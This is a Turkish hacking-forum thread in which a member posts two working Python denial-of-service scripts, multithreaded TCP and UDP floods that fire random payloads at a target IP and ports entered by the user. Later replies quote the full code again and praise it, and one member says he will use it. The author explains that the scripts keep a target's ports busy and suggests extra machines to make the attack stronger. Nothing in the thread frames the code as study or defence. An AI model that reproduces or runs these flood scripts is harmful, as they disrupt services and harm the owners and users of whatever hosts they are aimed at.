Python Orta seviye payload, dos attack kodu

Çokgen

Katılımcı Üye
4 Eyl 2023
414
195
Vericeğim kod orta seviye payload kodudur. Hedefe yollanan payloadı mb olarak atar. Dahada gelistirince atıcağım. Orta seviye bir kod.

Python:
import socket
import threading
import random
import time
import os
 
def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(5)
 
def udp_attack(ip, port):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        bytes_size = random.randint(500, 1490)  # Değişken paket boyutu
        bytes = random._urandom(bytes_size)
        client.sendto(bytes, (ip, port))
 
def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.02, 0.3))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()
 
def generate_payload():
    payload_type = random.choice(['alpha', 'num', 'alnum', 'special', 'mixed'])
    if payload_type == 'alpha':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    elif payload_type == 'num':
        characters = "0123456789"
    elif payload_type == 'alnum':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    elif payload_type == 'special':
        characters = "!@#$%^&*()-_=+{}[]|:;<>,.?~"
    else:  # mixed
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+{}[]|:;<>,.?~"
 
    payload_size = random.randint(500, 1400)  # Değişken boyutta payload
    payload = ''.join(random.choice(characters) for _ in range(payload_size))
    return payload
 
hedefip = input("Hedef ip: ")
ports = [int(x) for x in input("Hedeflenen portları virgülle ayırarak girin (örn. 80,21,22,443,8080): ").split(',')]
attack_type = input("Saldırı türünü seçin (TCP/UDP): ").upper()
MB_100 = 1000 * 1024 * 1024
THREADS_PER_PORT = int(input("Kaç iş parçacığı kullanmak istiyorsunuz? (Örnek: 100)"))  # Daha fazla iş parçacığı için kullanıcıdan girdi
 
stop_ping = False
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()
 
for port in ports:
    for _ in range(THREADS_PER_PORT):
        if attack_type == "TCP":
            t = threading.Thread(target=attack_target, args=(hedefip, port))
        else:
            t = threading.Thread(target=udp_attack, args=(hedefip, port))
        t.start()
 
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass
 
stop_ping = True
ping_thread.join()

Python:
import socket
import threading
import random
import time
import os

def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(1)

def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.01, 0.1))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()

def generate_payload():
    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    payloaad = "EXPLOIT ." + ''.join(random.choice(characters) for _ in range(random.randint(9000, 11000)))
    return payloaad * random.randint(90, 110)

hedefip = input(" Hedef ip: ")
ports = [80, 21, 22, 443, 8080]
MB_100 = 100 * 1024 * 1024
THREADS_PER_PORT = 5  # Her port için 50 iş parçacığı

stop_ping = False

# Ping işlemi için bir arka plan iş parçacığı başlat
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()

# Her port için belirtilen sayıda iş parçacığı başlat
for port in ports:
    for _ in range(THREADS_PER_PORT):
        t = threading.Thread(target=attack_target, args=(hedefip, port))
        t.start()

# Kullanıcının klavyeden bir tuşa basmasını bekleyin.
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass

# Ping işlemine son ver
stop_ping = True
ping_thread.join()
 
Son düzenleme:

Çokgen

Katılımcı Üye
4 Eyl 2023
414
195
Güzel çalışma. Eline sağlık
Çok saol :)

Vericeğim kod orta seviye payload kodudur. Hedefe yollanan payloadı mb olarak atar. Dahada gelistirince atıcağım. Orta seviye bir kod.

Python:
import socket
import threading
import random
import time
import os
 
def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(5)
 
def udp_attack(ip, port):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        bytes_size = random.randint(500, 1490)  # Değişken paket boyutu
        bytes = random._urandom(bytes_size)
        client.sendto(bytes, (ip, port))
 
def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.02, 0.3))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()
 
def generate_payload():
    payload_type = random.choice(['alpha', 'num', 'alnum', 'special', 'mixed'])
    if payload_type == 'alpha':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    elif payload_type == 'num':
        characters = "0123456789"
    elif payload_type == 'alnum':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    elif payload_type == 'special':
        characters = "!@#$%^&*()-_=+{}[]|:;<>,.?~"
    else:  # mixed
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+{}[]|:;<>,.?~"
 
    payload_size = random.randint(500, 1400)  # Değişken boyutta payload
    payload = ''.join(random.choice(characters) for _ in range(payload_size))
    return payload
 
hedefip = input("Hedef ip: ")
ports = [int(x) for x in input("Hedeflenen portları virgülle ayırarak girin (örn. 80,21,22,443,8080): ").split(',')]
attack_type = input("Saldırı türünü seçin (TCP/UDP): ").upper()
MB_100 = 1000 * 1024 * 1024
THREADS_PER_PORT = int(input("Kaç iş parçacığı kullanmak istiyorsunuz? (Örnek: 100)"))  # Daha fazla iş parçacığı için kullanıcıdan girdi
 
stop_ping = False
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()
 
for port in ports:
    for _ in range(THREADS_PER_PORT):
        if attack_type == "TCP":
            t = threading.Thread(target=attack_target, args=(hedefip, port))
        else:
            t = threading.Thread(target=udp_attack, args=(hedefip, port))
        t.start()
 
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass
 
stop_ping = True
ping_thread.join()

Python:
import socket
import threading
import random
import time
import os

def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(1)

def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.01, 0.1))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()

def generate_payload():
    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    payloaad = "EXPLOIT ." + ''.join(random.choice(characters) for _ in range(random.randint(9000, 11000)))
    return payloaad * random.randint(90, 110)

hedefip = input(" Hedef ip: ")
ports = [80, 21, 22, 443, 8080]
MB_100 = 100 * 1024 * 1024
THREADS_PER_PORT = 5  # Her port için 50 iş parçacığı

stop_ping = False

# Ping işlemi için bir arka plan iş parçacığı başlat
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()

# Her port için belirtilen sayıda iş parçacığı başlat
for port in ports:
    for _ in range(THREADS_PER_PORT):
        t = threading.Thread(target=attack_target, args=(hedefip, port))
        t.start()

# Kullanıcının klavyeden bir tuşa basmasını bekleyin.
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass

# Ping işlemine son ver
stop_ping = True
ping_thread.join()
Bu iki kodda ayrı şekilde çalışıyor. 5 farklı random payload türü var eğer saldırı yapıcağınız kişiyi meşgul edip, hedef pirtları belli süreliğine meşgul etmek istiyorsanız bu kodu kullanabilirsiniz. Hedef ipye saldırı tek pcden gerçekleştirilebilir ancak daha etkili olması için 2 veya 3 ek pc olması lazım. Bu kod benim fikir ve görüşlerimle yazılmıştır. Python network e başlayalı 2 gün oldu.
 

Arenklord

Uzman üye
9 Mar 2023
1,294
666
Orta doğu
Vericeğim kod orta seviye payload kodudur. Hedefe yollanan payloadı mb olarak atar. Dahada gelistirince atıcağım. Orta seviye bir kod.

Python:
import socket
import threading
import random
import time
import os
 
def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(5)
 
def udp_attack(ip, port):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        bytes_size = random.randint(500, 1490)  # Değişken paket boyutu
        bytes = random._urandom(bytes_size)
        client.sendto(bytes, (ip, port))
 
def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.02, 0.3))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()
 
def generate_payload():
    payload_type = random.choice(['alpha', 'num', 'alnum', 'special', 'mixed'])
    if payload_type == 'alpha':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    elif payload_type == 'num':
        characters = "0123456789"
    elif payload_type == 'alnum':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    elif payload_type == 'special':
        characters = "!@#$%^&*()-_=+{}[]|:;<>,.?~"
    else:  # mixed
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+{}[]|:;<>,.?~"
 
    payload_size = random.randint(500, 1400)  # Değişken boyutta payload
    payload = ''.join(random.choice(characters) for _ in range(payload_size))
    return payload
 
hedefip = input("Hedef ip: ")
ports = [int(x) for x in input("Hedeflenen portları virgülle ayırarak girin (örn. 80,21,22,443,8080): ").split(',')]
attack_type = input("Saldırı türünü seçin (TCP/UDP): ").upper()
MB_100 = 1000 * 1024 * 1024
THREADS_PER_PORT = int(input("Kaç iş parçacığı kullanmak istiyorsunuz? (Örnek: 100)"))  # Daha fazla iş parçacığı için kullanıcıdan girdi
 
stop_ping = False
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()
 
for port in ports:
    for _ in range(THREADS_PER_PORT):
        if attack_type == "TCP":
            t = threading.Thread(target=attack_target, args=(hedefip, port))
        else:
            t = threading.Thread(target=udp_attack, args=(hedefip, port))
        t.start()
 
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass
 
stop_ping = True
ping_thread.join()

Python:
import socket
import threading
import random
import time
import os

def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(1)

def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.01, 0.1))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()

def generate_payload():
    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    payloaad = "EXPLOIT ." + ''.join(random.choice(characters) for _ in range(random.randint(9000, 11000)))
    return payloaad * random.randint(90, 110)

hedefip = input(" Hedef ip: ")
ports = [80, 21, 22, 443, 8080]
MB_100 = 100 * 1024 * 1024
THREADS_PER_PORT = 5  # Her port için 50 iş parçacığı

stop_ping = False

# Ping işlemi için bir arka plan iş parçacığı başlat
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()

# Her port için belirtilen sayıda iş parçacığı başlat
for port in ports:
    for _ in range(THREADS_PER_PORT):
        t = threading.Thread(target=attack_target, args=(hedefip, port))
        t.start()

# Kullanıcının klavyeden bir tuşa basmasını bekleyin.
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass

# Ping işlemine son ver
stop_ping = True
ping_thread.join()
Geliştirilebilir eline sağlık
 

Çokgen

Katılımcı Üye
4 Eyl 2023
414
195
Moderatör tarafında düzenlendi:

Bekbilisim

Yeni üye
29 Kas 2021
42
15
Vericeğim kod orta seviye payload kodudur. Hedefe yollanan payloadı mb olarak atar. Dahada gelistirince atıcağım. Orta seviye bir kod.

Python:
import socket
import threading
import random
import time
import os
 
def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(5)
 
def udp_attack(ip, port):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        bytes_size = random.randint(500, 1490)  # Değişken paket boyutu
        bytes = random._urandom(bytes_size)
        client.sendto(bytes, (ip, port))
 
def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.02, 0.3))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()
 
def generate_payload():
    payload_type = random.choice(['alpha', 'num', 'alnum', 'special', 'mixed'])
    if payload_type == 'alpha':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    elif payload_type == 'num':
        characters = "0123456789"
    elif payload_type == 'alnum':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    elif payload_type == 'special':
        characters = "!@#$%^&*()-_=+{}[]|:;<>,.?~"
    else:  # mixed
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+{}[]|:;<>,.?~"
 
    payload_size = random.randint(500, 1400)  # Değişken boyutta payload
    payload = ''.join(random.choice(characters) for _ in range(payload_size))
    return payload
 
hedefip = input("Hedef ip: ")
ports = [int(x) for x in input("Hedeflenen portları virgülle ayırarak girin (örn. 80,21,22,443,8080): ").split(',')]
attack_type = input("Saldırı türünü seçin (TCP/UDP): ").upper()
MB_100 = 1000 * 1024 * 1024
THREADS_PER_PORT = int(input("Kaç iş parçacığı kullanmak istiyorsunuz? (Örnek: 100)"))  # Daha fazla iş parçacığı için kullanıcıdan girdi
 
stop_ping = False
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()
 
for port in ports:
    for _ in range(THREADS_PER_PORT):
        if attack_type == "TCP":
            t = threading.Thread(target=attack_target, args=(hedefip, port))
        else:
            t = threading.Thread(target=udp_attack, args=(hedefip, port))
        t.start()
 
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass
 
stop_ping = True
ping_thread.join()

Python:
import socket
import threading
import random
import time
import os

def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(1)

def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.01, 0.1))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()

def generate_payload():
    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    payloaad = "EXPLOIT ." + ''.join(random.choice(characters) for _ in range(random.randint(9000, 11000)))
    return payloaad * random.randint(90, 110)

hedefip = input(" Hedef ip: ")
ports = [80, 21, 22, 443, 8080]
MB_100 = 100 * 1024 * 1024
THREADS_PER_PORT = 5  # Her port için 50 iş parçacığı

stop_ping = False

# Ping işlemi için bir arka plan iş parçacığı başlat
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()

# Her port için belirtilen sayıda iş parçacığı başlat
for port in ports:
    for _ in range(THREADS_PER_PORT):
        t = threading.Thread(target=attack_target, args=(hedefip, port))
        t.start()

# Kullanıcının klavyeden bir tuşa basmasını bekleyin.
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass

# Ping işlemine son ver
stop_ping = True
ping_thread.join()
Eline sağlık
 

invisible blood

Uzman üye
15 Eyl 2023
1,177
443
Vericeğim kod orta seviye payload kodudur. Hedefe yollanan payloadı mb olarak atar. Dahada gelistirince atıcağım. Orta seviye bir kod.

Python:
import socket
import threading
import random
import time
import os
 
def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(5)
 
def udp_attack(ip, port):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:
        bytes_size = random.randint(500, 1490)  # Değişken paket boyutu
        bytes = random._urandom(bytes_size)
        client.sendto(bytes, (ip, port))
 
def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.02, 0.3))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()
 
def generate_payload():
    payload_type = random.choice(['alpha', 'num', 'alnum', 'special', 'mixed'])
    if payload_type == 'alpha':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    elif payload_type == 'num':
        characters = "0123456789"
    elif payload_type == 'alnum':
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    elif payload_type == 'special':
        characters = "!@#$%^&*()-_=+{}[]|:;<>,.?~"
    else:  # mixed
        characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+{}[]|:;<>,.?~"
 
    payload_size = random.randint(500, 1400)  # Değişken boyutta payload
    payload = ''.join(random.choice(characters) for _ in range(payload_size))
    return payload
 
hedefip = input("Hedef ip: ")
ports = [int(x) for x in input("Hedeflenen portları virgülle ayırarak girin (örn. 80,21,22,443,8080): ").split(',')]
attack_type = input("Saldırı türünü seçin (TCP/UDP): ").upper()
MB_100 = 1000 * 1024 * 1024
THREADS_PER_PORT = int(input("Kaç iş parçacığı kullanmak istiyorsunuz? (Örnek: 100)"))  # Daha fazla iş parçacığı için kullanıcıdan girdi
 
stop_ping = False
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()
 
for port in ports:
    for _ in range(THREADS_PER_PORT):
        if attack_type == "TCP":
            t = threading.Thread(target=attack_target, args=(hedefip, port))
        else:
            t = threading.Thread(target=udp_attack, args=(hedefip, port))
        t.start()
 
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass
 
stop_ping = True
ping_thread.join()

Python:
import socket
import threading
import random
import time
import os

def ping_target(ip):
    while not stop_ping:
        response = os.popen(f'ping -n 1 {ip}')
        print(response.read())
        time.sleep(1)

def attack_target(ip, port):
    total_sent = 0
    while total_sent < MB_100:
        payload = generate_payload()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            s.send(payload.encode('utf-8'))
            total_sent += len(payload)
            print(f"Port {port}: Toplam {total_sent / (1024 * 1024)} MB gönderildi.")
            time.sleep(random.uniform(0.01, 0.1))
        except Exception as e:
            print(f"Port {port}: Hata oluştu: {str(e)}")
            s.close()

def generate_payload():
    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    payloaad = "EXPLOIT ." + ''.join(random.choice(characters) for _ in range(random.randint(9000, 11000)))
    return payloaad * random.randint(90, 110)

hedefip = input(" Hedef ip: ")
ports = [80, 21, 22, 443, 8080]
MB_100 = 100 * 1024 * 1024
THREADS_PER_PORT = 5  # Her port için 50 iş parçacığı

stop_ping = False

# Ping işlemi için bir arka plan iş parçacığı başlat
ping_thread = threading.Thread(target=ping_target, args=(hedefip,))
ping_thread.start()

# Her port için belirtilen sayıda iş parçacığı başlat
for port in ports:
    for _ in range(THREADS_PER_PORT):
        t = threading.Thread(target=attack_target, args=(hedefip, port))
        t.start()

# Kullanıcının klavyeden bir tuşa basmasını bekleyin.
try:
    input("\nSaldırıyı durdurmak için bir tuşa basın...\n")
except:
    pass

# Ping işlemine son ver
stop_ping = True
ping_thread.join()
Teşekkürler hocam ellerinize sağlık kullanacağım :)
 

Çokgen

Katılımcı Üye
4 Eyl 2023
414
195
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.